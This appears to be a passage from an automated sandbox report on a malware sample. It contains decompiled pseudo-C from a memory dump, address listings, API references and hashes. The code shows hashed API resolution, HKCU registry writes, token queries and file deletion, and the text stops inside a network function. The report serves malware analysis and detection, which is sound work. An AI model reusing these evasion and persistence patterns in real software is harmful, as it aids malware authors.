0x000921fb
0x00092210
0x00092214
0x00092225
0x0009222a
0x0009222d
0x00092243
0x00092250
0x0009225f
0x00092271
0x00092276
0x0009228e
0x00092290
0x00092292
0x00000000
0x00092294
0x0009229b
0x000922a0
0x000922a6
0x000922a8
0x000922ac
0x00000000
0x000922ae
0x000922ae
0x000922ae
0x000922ac
0x000922b4
0x000922bb
0x000922c6
0x00000000
0x00092240
0x00092240
0x00092240
0x00092240
0x000922b2
0x000922b2
0x00000000
0x00092216
0x00092216
0x00092216
0x000922c8
0x000922d1

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009228E

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction ID: fb471403ba7db389b86e66c56b0c3150b843541ae7cfc357d9a195603fbaec2f
Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction Fuzzy Hash: E92186B2A403197FEF21AB909D53FFE7664AB15B10F140034FA14762D2E6A1A924E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 000A5420, Relevance: 3.1, APIs: 2, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E000A5420(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t10;
				intOrPtr* _t12;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;
				WCHAR* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t17 = 0;
				while(1) {
					E0009BF50(0, 0, 0xad68947);
					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t19 = _t4;
					_t5 = E00094A90(_t4, 0);
					_t22 = _t20 + 0x10;
					_t28 = _t5 & 0x00000001;
					if((_t5 & 0x00000001) == 0) {
						_t15 = E0009BF50(_t28, 0, 0xb8e7db5);
						_t22 = _t22 + 8;
						 *_t15(_t19);
					}
					E0009BF50(_t28, 0, 0xbf8ba27);
					_t23 = _t22 + 8;
					_t7 = GetFileAttributesW(_t18); // executed
					_t29 = _t7 - 0xffffffff;
					if(_t7 == 0xffffffff) {
						break;
					}
					_t10 = E0009BF50(_t29, 0, 0xad64007);
					 *_t10(_t18);
					_t12 = E0009BF50(_t29, 0, 0x7a2bc0);
					 *_t12(0xbb8);
					_t17 = _t17 + 1;
					_t14 = E00099D50(0x647400a6);
					_t20 = _t23 + 0x14;
					if(_t17 != _t14) {
						continue;
					}
					break;
				}
				E0009B570(_t18);
				return 0;
			}

0x000a5426
0x000a5429
0x000a5430
0x000a5437
0x000a5452
0x000a5454
0x000a5459
0x000a545e
0x000a5461
0x000a5463
0x000a546c
0x000a5471
0x000a5475
0x000a5475
0x000a547e
0x000a5483
0x000a5487
0x000a5489
0x000a548c
0x00000000
0x00000000
0x000a5495
0x000a549e
0x000a54a7
0x000a54b4
0x000a54b6
0x000a54bc
0x000a54c1
0x000a54c6
0x00000000
0x00000000
0x00000000
0x000a54c6
0x000a54cd
0x000a54db

APIs

CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 000A5452
GetFileAttributesW.KERNEL32(?), ref: 000A5487

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction ID: 59e9257859e20cd102f1783b0292012910d8ac744406bdd59104b605c7079ea9
Opcode Fuzzy Hash: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction Fuzzy Hash: 67014CA6A8420436E96032B43D53FBE31584BA6F2FF150130FA5CA91C3FAC57A1524B7

Uniqueness

Uniqueness Score: -1.00%

Function 000A3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000A3D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t12;
				signed char _t13;
				void* _t14;
				long _t17;
				void* _t18;
				signed int _t21;
				intOrPtr* _t22;
				char* _t28;
				signed int _t29;

				_t44 = __eflags;
				_t13 = E000A5000(_t12, __eflags, 0xffffffff);
				_t14 = E00099D50(0x647400a5);
				E0009BF50(_t44, _t14, E00099D50(0x63c03c4b));
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if(_t17 == 0) {
					_t28 = _a20;
					_t18 = E00099D50(0x647400a5);
					E0009BF50(__eflags, _t18, E00099D50(0x69a6701b));
					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
					__eflags = _t21;
					_t10 = _t21 == 0;
					__eflags = _t10;
					_t29 = _t28 & 0xffffff00 | _t10;
					_t22 = E0009BF50(_t10, 9, 0x3111c69);
					 *_t22(_a4);
				} else {
					_t29 = 0;
				}
				return _t29;
			}

0x000a3d80
0x000a3d8b
0x000a3da1
0x000a3dba
0x000a3dd5
0x000a3dd9
0x000a3ddf
0x000a3dea
0x000a3e03
0x000a3e18
0x000a3e1a
0x000a3e1c
0x000a3e1c
0x000a3e1c
0x000a3e26
0x000a3e31
0x000a3ddb
0x000a3ddb
0x000a3ddb
0x000a3e39

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 000A3DD5
RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 000A3E18

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateValue
String ID:
API String ID: 2259555733-0
Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction ID: 34f914742957e9b3a923979f7d0b4f0d0f3ef5a07ae0aaef82da9af9b250b3e3
Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction Fuzzy Hash: 3E1106B69002443FEF116AA4AC93FEF360CDB52769F150034FE1895293E651EA2496F3

Uniqueness

Uniqueness Score: -1.00%

Function 0009AD80, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0009AD80(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v16;
				long _v20;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				void* _t15;
				int _t19;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t10 = E00099D50(0x647400a5);
				_t12 = E0009BF50(_t33, _t10, E00099D50(0x6b5f7e12));
				_t30 = _t27 + 0x10;
				_t13 =  *_t12(_a4, 8,  &_v16);
				_t34 = _t13;
				if(_t13 == 0) {
					_t26 = 0;
					__eflags = 0;
					L7:
					return _t26;
				}
				_t24 = _a8;
				_t15 = E000AB530(_t13, _t34, _v16); // executed
				_t31 = _t30 + 4;
				_t26 = _t15;
				if(_t24 != 0) {
					_t36 = _t26;
					if(_t26 != 0) {
						E0009BF50(_t36, 9, 0xbd557e);
						_t31 = _t31 + 8;
						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
						if(_t19 == 0) {
							E0009B570(_t26);
							_t31 = _t31 + 4;
							_t26 = 0;
						}
					}
				}
				E0009BF50(0, 0, 0xb8e7db5);
				CloseHandle(_v16); // executed
				goto L7;
			}

0x0009ad80
0x0009ad8b
0x0009ad92
0x0009ad9e
0x0009adb7
0x0009adbc
0x0009adc6
0x0009adc8
0x0009adca
0x0009ae26
0x0009ae26
0x0009ae28
0x0009ae30
0x0009ae30
0x0009adcc
0x0009add2
0x0009add7
0x0009adda
0x0009adde
0x0009ade0
0x0009ade2
0x0009adeb
0x0009adf0
0x0009adff
0x0009ae03
0x0009ae06
0x0009ae0b
0x0009ae0e
0x0009ae0e
0x0009ae03
0x0009ade2
0x0009ae17
0x0009ae22
0x00000000

APIs

Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A
Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 0009ADFF

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

CloseHandle.KERNEL32(00000000), ref: 0009AE22

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$CloseFreeHandleHeap
String ID:
API String ID: 2052167596-0
Opcode ID: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction ID: b37742305f65ce12f0e32efa7ea092cefdbb4e05abe4ea9711172d8814755a93
Opcode Fuzzy Hash: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction Fuzzy Hash: 5911C676E0011877EF2166A4BC12BAF76689F52B14F054134FD1866242FB71AA2496E3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000AB530(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				int _t11;
				signed char _t16;
				void* _t17;
				int _t19;
				DWORD* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;

				_v20 = 0;
				E0009BF50(__eflags, 9, 0xbd557e);
				_t25 = _t24 + 8;
				_t21 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
				_t23 = 0;
				_t30 = _t11;
				if(_t11 == 0) {
					_t16 = E000955C0( *((intOrPtr*)(E0009BF50(_t30, 0, E00099D50(0x68042b4e))))(), 0x7a);
					_t25 = _t25 + 0x14;
					if((_t16 & 0x00000001) != 0) {
						_t17 = E00098290(_v20);
						_t25 = _t25 + 4;
						_t32 = _t17;
						if(_t17 != 0) {
							_t22 = _t17;
							E0009BF50(_t32, 9, 0xbd557e);
							_t25 = _t25 + 8;
							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
							_t23 = _t22;
							if(_t19 == 0) {
								E0009B570(_t22);
								_t25 = _t25 + 4;
								_t23 = 0;
							}
						}
					}
				}
				return _t23;
			}

0x000ab537
0x000ab545
0x000ab54a
0x000ab54d
0x000ab55a
0x000ab55c
0x000ab55e
0x000ab560
0x000ab57f
0x000ab584
0x000ab589
0x000ab58e
0x000ab593
0x000ab596
0x000ab598
0x000ab59a
0x000ab5a3
0x000ab5a8
0x000ab5b5
0x000ab5b9
0x000ab5bb
0x000ab5be
0x000ab5c3
0x000ab5c6
0x000ab5c6
0x000ab5bb
0x000ab598
0x000ab589
0x000ab5d1

APIs

GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HeapInformationToken$AllocateFreeLibraryLoad
String ID:
API String ID: 4190244075-0
Opcode ID: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction ID: c02346bfaffdcde126331413b0063d1c4020c592f3f22175bb62d888ac9fafc5
Opcode Fuzzy Hash: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction Fuzzy Hash: 1E01C872E8071836EE6165F47C43FBF7D5D9F52B59F050030F90CA5193F6929A1491A2

Uniqueness

Uniqueness Score: -1.00%

Function 00093F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00093F90(void* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				long _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				long _t17;

				_t4 = _a8;
				_t25 = _t4;
				if(_t4 == 0) {
					return 0;
				}
				_t8 = E000922E0(_t25, E00091460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
				_t26 = _a4;
				_t17 = _t8;
				if(_a4 == 0) {
					E0009BF50(__eflags, 0, 0x8685de3);
					_t10 = RtlAllocateHeap( *0xb2124, 8, _t17); // executed
					return _t10;
				}
				E0009BF50(_t26, 0, E00099D50(0x6caeab8f));
				_t15 =  *0xb2124; // 0x6b0000
				_t14 = RtlReAllocateHeap(_t15, E00099D50(0x647400a4), _a4, _t17); // executed
				return _t14;
			}

0x00093f96
0x00093f99
0x00093f9b
0x00000000
0x00093ffb
0x00093fb4
0x00093fbc
0x00093fc0
0x00093fc2
0x00094006
0x00094017
0x00000000
0x00094017
0x00093fd4
0x00093fdc
0x00093ff7
0x00000000

APIs

RtlReAllocateHeap.NTDLL(006B0000,00000000,00000000,00000000), ref: 00093FF7
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00094017

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction ID: 59310788cf4f6075fd4ca10262006a59aba758a0c958dda9fa40e88a89838614
Opcode Fuzzy Hash: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction Fuzzy Hash: 9801F9B6D041047BEE102274FC13FAE369C9B653ADF050430FD0DA1203F9619B14AAF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A9C40, Relevance: 2.5, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A9C40(void* __eflags, void** _a4) {
				int _t6;
				int _t8;
				void** _t10;
				void* _t11;
				void* _t12;

				_t10 = _a4;
				_t6 = E00094A90( *_t10, 0);
				_t12 = _t11 + 8;
				_t15 = _t6 & 0x00000001;
				if((_t6 & 0x00000001) == 0) {
					E0009BF50(_t15, 0, 0xb1fd105);
					_t12 = _t12 + 8;
					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
				}
				_t16 = _t10[2];
				if(_t10[2] != 0) {
					E0009BF50(_t16, 0, 0xb8e7db5);
					_t8 = CloseHandle(_t10[2]); // executed
					return _t8;
				}
				return _t6;
			}

0x000a9c44
0x000a9c4b
0x000a9c50
0x000a9c53
0x000a9c55
0x000a9c5e
0x000a9c63
0x000a9c6f
0x000a9c6f
0x000a9c71
0x000a9c75
0x000a9c7e
0x000a9c89
0x00000000
0x000a9c89
0x000a9c8d

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction ID: 905793d0daaa26e2a5b72c4c53da7d7b4e298965dc6cf40139e6e8747d7e902f
Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction Fuzzy Hash: 0FE0D836784304B6EE2036E0FD17F9472945F11B66F104434FA8D751E6F6E279109AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0009BF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0009BF50(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v159;
				signed int _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed int _t51;
				signed int* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				void* _t62;

				_t60 = _a8;
				_t32 = E00099D50(0x647402c4);
				_t62 = _t61 + 4;
				_t57 = _t60 % _t32;
				_t35 =  *((intOrPtr*)(0xb2cb8 + _t57 * 4));
				_t58 = _t57;
				if(_t35 == 0) {
					L4:
					_t51 = _a4;
					_v20 = 0xb2cb8 + _t58 * 4;
					if(_t51 > 0x23) {
						L39:
						_t37 =  *(0xb2134 + _t51 * 4);
						if( *(0xb2134 + _t51 * 4) != 0) {
							L49:
							_t38 = E0009D830(_t37, _t60);
							_t52 = _v20;
							__eflags = _t38;
							if(__eflags != 0) {
								L52:
								 *_t52 = _t60;
								 *(0xb4198 + _t58 * 4) = _t38;
								return _t38;
							}
							_t39 = E0009BF50(__eflags, 0, 0xba94474);
							 *_t39(0);
							L51:
							_t38 = 0;
							goto L52;
						}
						if(_t51 == 0x17) {
							_t37 =  *0xb37cc; // 0x0
							__eflags = _t37;
							if(__eflags != 0) {
								L48:
								 *(0xb2134 + _t51 * 4) = _t37;
								goto L49;
							}
							L46:
							_t41 = E0009BF50(_t77, 0, 0xba94474);
							 *_t41(0);
							 *(0xb2134 + _t51 * 4) = 0;
							_t52 = _v20;
							goto L51;
						}
						if(_t51 == 0x16) {
							_t37 =  *0xb4b38; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								goto L46;
							}
							goto L48;
						}
						if(_t51 != 0x15) {
							_t37 = LoadLibraryA( &_v52); // executed
							__eflags = _t37;
							if(__eflags != 0) {
								goto L48;
							}
							goto L46;
						}
						_t37 =  *0xb37d0; // 0x0
						_t77 = _t37;
						if(_t37 != 0) {
							goto L48;
						}
						goto L46;
					}
					switch( *((intOrPtr*)(_t51 * 4 +  &M000B00B0))) {
						case 0:
							L38:
							E0009C560( &_v52, E0009D0A0(0xb0550, 0xb0550,  &_v159), 0xffffffff);
							_t62 = _t62 + 0x14;
							goto L39;
						case 1:
							goto L38;
						case 2:
							__eax = 0xb0bfc;
							goto L38;
						case 3:
							__eax = 0xb0894;
							goto L38;
						case 4:
							__eax = 0xb1044;
							goto L38;
						case 5:
							__eax = 0xb05e2;
							goto L38;
						case 6:
							__eax = 0xb07e9;
							goto L38;
						case 7:
							__eax = 0xb043c;
							goto L38;
						case 8:
							__eax = 0xb0538;
							goto L38;
						case 9:
							__eax = 0xb0781;
							goto L38;
						case 0xa:
							__eax = 0xb09fc;
							goto L38;
						case 0xb:
							__eax = 0xb097c;
							goto L38;
						case 0xc:
							__eax = 0xb101b;
							goto L38;
						case 0xd:
							__eax = 0xb07a6;
							goto L38;
						case 0xe:
							__eax = 0xb068d;
							goto L38;
						case 0xf:
							__eax = 0xb0b87;
							goto L38;
						case 0x10:
							__eax = 0xb0c24;
							goto L38;
						case 0x11:
							__eax = 0xb0b75;
							goto L38;
						case 0x12:
							__eax = 0xb09bc;
							goto L38;
						case 0x13:
							__eax = 0xb04b8;
							goto L38;
						case 0x14:
							__eax = 0xb052c;
							goto L38;
						case 0x15:
							goto L39;
						case 0x16:
							__eax = 0xb0814;
							goto L38;
						case 0x17:
							__eax = 0xb0900;
							goto L38;
						case 0x18:
							__eax = 0xb0480;
							goto L38;
						case 0x19:
							__eax = 0xb076e;
							goto L38;
						case 0x1a:
							__eax = 0xb0699;
							goto L38;
						case 0x1b:
							__eax = 0xb04db;
							goto L38;
						case 0x1c:
							__eax = 0xb0c31;
							goto L38;
						case 0x1d:
							__eax = 0xb0b60;
							goto L38;
						case 0x1e:
							__eax = 0xb09c4;
							goto L38;
						case 0x1f:
							__eax = 0xb0a2c;
							goto L38;
						case 0x20:
							__eax = 0xb09a6;
							goto L38;
					}
				}
				0;
				0;
				while(1) {
					_t69 = _t35 - _t60;
					if(_t35 == _t60) {
						break;
					}
					E00091460(_t69, _t58, 1);
					_t62 = _t62 + 8;
					_t58 =  >  ? 0 : _t58 + 1;
					_t35 =  *((intOrPtr*)(0xb2cb8 + _t58 * 4));
					if(_t35 != 0) {
						continue;
					}
					goto L4;
				}
				return  *(0xb4198 + _t58 * 4);
			}

0x0009bf5c
0x0009bf64
0x0009bf69
0x0009bf74
0x0009bf76
0x0009bf7d
0x0009bf81
0x0009bfb6
0x0009bfb6
0x0009bfc0
0x0009bfc6
0x0009c0fe
0x0009c0fe
0x0009c107
0x0009c163
0x0009c165
0x0009c16d
0x0009c170
0x0009c172
0x0009c189
0x0009c189
0x0009c18b
0x00000000
0x0009c18b
0x0009c17b
0x0009c185
0x0009c187
0x0009c187
0x00000000
0x0009c187
0x0009c10c
0x0009c127
0x0009c12c
0x0009c12e
0x0009c15c
0x0009c15c
0x00000000
0x0009c15c
0x0009c130
0x0009c137
0x0009c141
0x0009c143
0x0009c14e
0x00000000
0x0009c14e
0x0009c111
0x0009c153
0x0009c158
0x0009c15a
0x00000000
0x00000000
0x00000000
0x0009c15a
0x0009c116
0x0009c1a1
0x0009c1a7
0x0009c1a9
0x00000000
0x00000000
0x00000000
0x0009c1ab
0x0009c11c
0x0009c121
0x0009c123
0x00000000
0x00000000
0x00000000
0x0009c125
0x0009bfd1
0x00000000
0x0009c0df
0x0009c0f6
0x0009c0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0009bfee
0x00000000
0x00000000
0x0009bff8
0x00000000
0x00000000
0x0009c002
0x00000000
0x00000000
0x0009c00c
0x00000000
0x00000000
0x0009c016
0x00000000
0x00000000
0x0009c020
0x00000000
0x00000000
0x0009c02a
0x00000000
0x00000000
0x0009c034
0x00000000
0x00000000
0x0009c03e
0x00000000
0x00000000
0x0009c048
0x00000000
0x00000000
0x0009c052
0x00000000
0x00000000
0x0009c05c
0x00000000
0x00000000
0x0009c063
0x00000000
0x00000000
0x0009c06a
0x00000000
0x00000000
0x0009c071
0x00000000
0x00000000
0x0009c078
0x00000000
0x00000000
0x0009c07f
0x00000000
0x00000000
0x0009c086
0x00000000
0x00000000
0x0009c08d
0x00000000
0x00000000
0x00000000
0x00000000
0x0009c094
0x00000000
0x00000000
0x0009c09b
0x00000000
0x00000000
0x0009c0a2
0x00000000
0x00000000
0x0009c0a9
0x00000000
0x00000000
0x0009c0b0
0x00000000
0x00000000
0x0009c0da
0x00000000
0x00000000
0x0009c0b7
0x00000000
0x00000000
0x0009c0be
0x00000000
0x00000000
0x0009c0c5
0x00000000
0x00000000
0x0009c0cc
0x00000000
0x00000000
0x0009c0d3
0x00000000
0x00000000
0x0009bfd1
0x0009bf89
0x0009bf8d
0x0009bf90
0x0009bf90
0x0009bf92
0x00000000
0x00000000
0x0009bf97
0x0009bf9c
0x0009bfa8
0x0009bfab
0x0009bfb4
0x00000000
0x00000000
0x00000000
0x0009bfb4
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction ID: 0b1bd87d8382e675236564e8b84030d3a1a2fb833d4548e60d4beaf6911734a0
Opcode Fuzzy Hash: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction Fuzzy Hash: 5F517361F88309D7FF20AA98EC50EFFA2969795308F508132B507CB293D62ADD807756

Uniqueness

Uniqueness Score: -1.00%

Function 000AB390, Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000AB390(void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v74;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t29;
				signed char _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr* _t37;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t43;
				intOrPtr* _t45;
				void* _t47;
				void* _t48;
				signed char _t49;
				intOrPtr* _t50;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t68;

				_t55 = _a8;
				_t26 = E0009BF50(__eflags, 9, 0xc654d62);
				_t62 = _t61 + 8;
				_t27 =  *_t26(_t55, 1);
				_t56 = 0;
				_t75 = _t27;
				if(_t27 != 0) {
					_t29 = E0009BF50(_t75, 9, 0x4a9139c);
					_t31 = E000955C0( *_t29(_t55, 1, 0, 0), 0);
					_t64 = _t62 + 0x10;
					if((_t31 & 0x00000001) == 0) {
						_t50 = _a4;
						_v20 = 0;
						_t32 = E00091C20();
						_t77 = _t32 - 3;
						if(_t32 < 3) {
							__eflags = _t32 - 2;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t33 = E0009BF50(__eflags, 9, 0xabc78f7);
								_t65 = _t64 + 8;
								_t34 =  *_t33(0xb10d8, 1,  &_v20, 0);
								__eflags = _t34;
								if(_t34 == 0) {
									goto L10;
								} else {
									goto L7;
								}
							}
						} else {
							_t43 = E00099D50(0x647400a5);
							_t45 = E0009BF50(_t77, _t43, E00099D50(0x6ec8785b));
							_t47 = E00097200(0xb10b0,  &_v74);
							_t48 =  *_t45(_t47, 1,  &_v20, 0); // executed
							_t49 = E000955C0(_t48, 0);
							_t65 = _t64 + 0x20;
							if((_t49 & 0x00000001) == 0) {
								L7:
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t35 = E00099D50(0x647400a5);
								_t37 = E0009BF50(__eflags, _t35, E00099D50(0x6cdc2320));
								_t68 = _t65 + 0x10;
								__eflags =  *_t37(_v20,  &_v28,  &_v32,  &_v24);
								if(__eflags == 0) {
									L9:
									_t39 = E0009BF50(__eflags, 0, 0x982abe5);
									 *_t39(_v20);
									goto L10;
								} else {
									_t41 = E0009BF50(__eflags, 9, 0x4a8239c);
									_t68 = _t68 + 8;
									__eflags =  *_t41(_t55, _v28, _v32, _v24);
									if(__eflags == 0) {
										goto L9;
									}
								}
							} else {
								L10:
								_v20 = 0xffffffff;
							}
						}
						if(_t50 != 0) {
							 *_t50 = 0xc;
							 *((intOrPtr*)(_t50 + 4)) = _t55;
							 *((intOrPtr*)(_t50 + 8)) = 0;
						}
						_t56 = _v20;
					}
				}
				return _t56;
			}

0x000ab399
0x000ab3a3
0x000ab3a8
0x000ab3ae
0x000ab3b0
0x000ab3b2
0x000ab3b4
0x000ab3c1
0x000ab3d5
0x000ab3da
0x000ab3df
0x000ab3e5
0x000ab3e8
0x000ab3ef
0x000ab3f4
0x000ab3f7
0x000ab451
0x000ab454
0x00000000
0x000ab45a
0x000ab461
0x000ab466
0x000ab476
0x000ab478
0x000ab47a
0x00000000
0x00000000
0x00000000
0x00000000
0x000ab47a
0x000ab3f9
0x000ab3fe
0x000ab417
0x000ab42a
0x000ab43b
0x000ab440
0x000ab445
0x000ab44a
0x000ab480
0x000ab480
0x000ab487
0x000ab48e
0x000ab49a
0x000ab4b3
0x000ab4b8
0x000ab4cc
0x000ab4ce
0x000ab4ef
0x000ab4f6
0x000ab501
0x00000000
0x000ab4d0
0x000ab4d7
0x000ab4dc
0x000ab4eb
0x000ab4ed
0x00000000
0x00000000
0x000ab4ed
0x000ab44c
0x000ab503
0x000ab503
0x000ab503
0x000ab44a
0x000ab50c
0x000ab50e
0x000ab514
0x000ab517
0x000ab517
0x000ab51e
0x000ab51e
0x000ab3df
0x000ab52a

APIs

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 000AB43B

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: DescriptorSecurity$ConvertLibraryLoadString
String ID:
API String ID: 3927295052-0
Opcode ID: b422763720d8ec2f1195fc1ee137594ed78134cb5476533bc3a2dd39b7380023
Instruction ID: cdfd1708e76530cfbf0315baddca517396f0df51418b593272bf9a4082254807
Opcode Fuzzy Hash: b422763720d8ec2f1195fc1ee137594ed78134cb5476533bc3a2dd39b7380023
Instruction Fuzzy Hash: EA41B7B2D402156BEF216BE0AC53FFF7668AF11715F050424FA18B5283F7A1AA0596E2

Uniqueness

Uniqueness Score: -1.00%

Function 0009D270, Relevance: 1.6, APIs: 1, Instructions: 98
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009D270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				signed short _v32;
				intOrPtr _v40;
